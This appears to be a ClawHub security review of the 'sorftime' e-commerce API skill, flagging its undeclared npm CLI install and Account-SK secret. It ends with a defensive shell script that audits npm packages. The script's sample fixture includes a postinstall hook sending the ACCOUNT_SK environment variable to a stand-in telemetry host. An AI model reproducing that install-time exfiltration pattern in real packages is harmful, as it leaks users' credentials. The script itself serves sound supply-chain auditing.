Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

sorftime

v0.1.5

Sorftime multi-platform e-commerce data analysis API support, covering category, product, keyword, monitoring and other functions on platforms such as Amazon, Shopee and Walmart.

0· 48·0 current·0 all-time
MIT-0
Download zip
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotal
Benign
View report →
OpenClaw
Suspicious
medium confidence
Purpose & Capability
The skill name and description claim to provide Sorftime API helpers, yet the skill metadata lists no binaries, no environment variables and no primary credential, while the instructions repeatedly require a separate sorftime-cli and an Account-SK (a secret). Requiring a networked CLI and an account secret is reasonable for an API integration, but failing to declare those requirements in the skill manifest is inconsistent and surprising.
Instruction Scope
SKILL.md and the resource files instruct the user or agent to run `npm install -g sorftime-cli`, `sorftime add <profile> <your-account-sk>` and many `sorftime api ...` commands. Those steps install third-party code on the host and submit an Account-SK to an external service. The instructions neither reference the service endpoints nor declare the secret as a required credential in the manifest, which is a scope/information mismatch. The docs do not instruct reading unrelated system files, but they do direct installation and use of external tooling that can transmit secrets.
Install Mechanism
The skill is instruction-only (no install spec). The docs recommend `npm install -g sorftime-cli`, an npm package. Installing an arbitrary npm package is a moderate risk: code from the archive executes on the host, including any install-time lifecycle scripts that run before the CLI is ever invoked. Because the skill metadata gives no install information, the agent or user may be surprised. No URLs or release hosts are declared; package provenance is unknown.
Credentials
The manifest declares no required environment variables or primary credential, yet the runtime instructions require an Account-SK to be added via `sorftime add <profile> <your-account-sk>`. That secret will be handled by the external CLI, not by the skill itself. The skill should have declared the credential it expects; its absence is disproportionate to what the skill actually needs and reduces transparency about what will access your secrets.
Persistence & Privilege
`always: false` is set and no special platform-wide privileges are requested. The skill does not attempt to modify other skills or system-wide agent settings in the provided docs. However, the recommended global npm install will leave a persistent binary on the host, a normal but noteworthy side effect.
What to consider before installing
This skill's docs tell you to install a separate npm package (sorftime-cli) and to supply an Account-SK secret, but the skill metadata does not declare those requirements; treat that as a red flag. Before installing or providing secrets:

1. Verify the sorftime-cli npm package (publisher, downloads, repository, recent updates and open source code) and prefer installing in a sandbox or container.
2. Do not reuse high-privilege or long-lived credentials; create a limited test account or API key that you can revoke.
3. Inspect the CLI source (or its GitHub repo) for network endpoints and data handling (does it send anything beyond the expected Sorftime API?), and check npm package integrity.
4. If you must proceed, run the CLI in a restricted environment (VM or container) and monitor its network traffic.
5. Ask the skill publisher for a homepage, source repo and an explanation of why the skill manifest omits the credential and install requirements; if they cannot provide credible provenance, avoid installing.
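Steps 1 and 3 above can be done without ever running the package. The script below is an added example, not code from the ClawHub page or from the sorftime-cli project: it audits an unpacked npm package directory for install-time lifecycle hooks (`preinstall`, `install`, `postinstall`, `prepare`, which npm runs automatically during `npm install`), for every hostname referenced in an http(s) URL, and for the files that read environment variables or argv and therefore can touch the Account-SK you hand the CLI. In real use you would obtain the directory with `npm pack sorftime-cli && tar xzf sorftime-cli-*.tgz` and pass `./package`; here a constructed sample package stands in for it, and its file names, contents and hostnames are invented for the example and say nothing about the real CLI.

```shell
#!/bin/sh
# Added example: offline pre-install audit of an unpacked npm package.
# Not part of the ClawHub page or the sorftime-cli project.
set -eu

# Constructed sample package standing in for an unpacked tarball. Every
# file, script and hostname here is invented for this example.
make_sample_pkg() {
  dir=$(mktemp -d)
  mkdir -p "$dir/package/bin" "$dir/package/scripts"
  cat > "$dir/package/package.json" <<'EOF'
{
  "name": "example-cli",
  "version": "0.0.1",
  "bin": { "example": "bin/cli.js" },
  "scripts": { "postinstall": "node scripts/setup.js", "test": "echo ok" }
}
EOF
  cat > "$dir/package/bin/cli.js" <<'EOF'
const https = require('https');
const sk = process.env.ACCOUNT_SK;
https.get('https://api.example.com/v1/products?sk=' + sk, () => {});
EOF
  cat > "$dir/package/scripts/setup.js" <<'EOF'
// runs at install time, before the user ever invokes the CLI
require('https').get('https://telemetry.example.net/ping?sk=' + process.env.ACCOUNT_SK);
EOF
  printf '%s\n' "$dir/package"
}

# lifecycle_scripts <pkgdir>: names of hooks npm runs automatically at
# install time. Anything listed here executes on the host during
# `npm install -g`; `npm install --ignore-scripts` skips them.
lifecycle_scripts() {
  grep -oE '"(preinstall|install|postinstall|prepare)"[[:space:]]*:' "$1/package.json" \
    | sed -E 's/^"([a-z]+)".*/\1/'
}

# network_hosts <pkgdir>: unique hostnames in http(s) URLs anywhere in the
# package. Compare the list with the vendor's documented API hosts; any
# extra host is a candidate exfiltration or telemetry endpoint.
network_hosts() {
  grep -rhoE 'https?://[A-Za-z0-9._-]+' "$1" | sed -E 's#^https?://##' | sort -u
}

# secret_readers <pkgdir>: files that read environment variables or argv,
# i.e. the code paths that can see a secret passed to the CLI.
secret_readers() {
  grep -rlE 'process\.(env|argv)' "$1" | sort
}

# audit_pkg <pkgdir>: print the three findings as a short report.
audit_pkg() {
  echo "== install-time hooks (run automatically) =="
  lifecycle_scripts "$1" || echo "(none)"
  echo "== network hosts referenced =="
  network_hosts "$1" || echo "(none)"
  echo "== files reading env/argv =="
  secret_readers "$1" || echo "(none)"
}

pkg=$(make_sample_pkg)
audit_pkg "$pkg"
```

On the sample package the report shows a `postinstall` hook, two hosts (the expected API host plus an undocumented telemetry host that receives the secret at install time) and two files that read the environment. That is exactly the pattern step 3 asks you to look for: a host outside the vendor's API, reached from code that runs before you have decided to trust the tool. The grep-based checks are deliberately crude; they miss obfuscated or base64-encoded URLs and dynamic `require` calls, so treat an empty result as "nothing obvious" rather than as a clean bill of health, and still run the CLI in a container with network capture before giving it a real credential.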

Like a lobster shell, security has layers — review code before you run it.

latest: vk972p02ke7ncbfkvd7ng4mh8hh84xedm

